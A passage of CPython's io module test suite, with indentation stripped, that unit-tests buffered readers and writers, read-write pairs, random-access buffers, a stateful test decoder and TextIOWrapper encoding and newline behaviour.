@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
# bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak
# when registering codecs and cleanup functions.
def lookupTestDecoder(name):
if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=StatefulIncrementalDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
codecs.register(lookupTestDecoder)
self.addCleanup(codecs.unregister, lookupTestDecoder)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, encoding="utf-8", newline=42)
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO(), encoding="utf-8")
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b, encoding="ascii")
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw, encoding="utf-8")
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b, encoding="locale")
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b, encoding="locale")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio, encoding="utf-8").xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
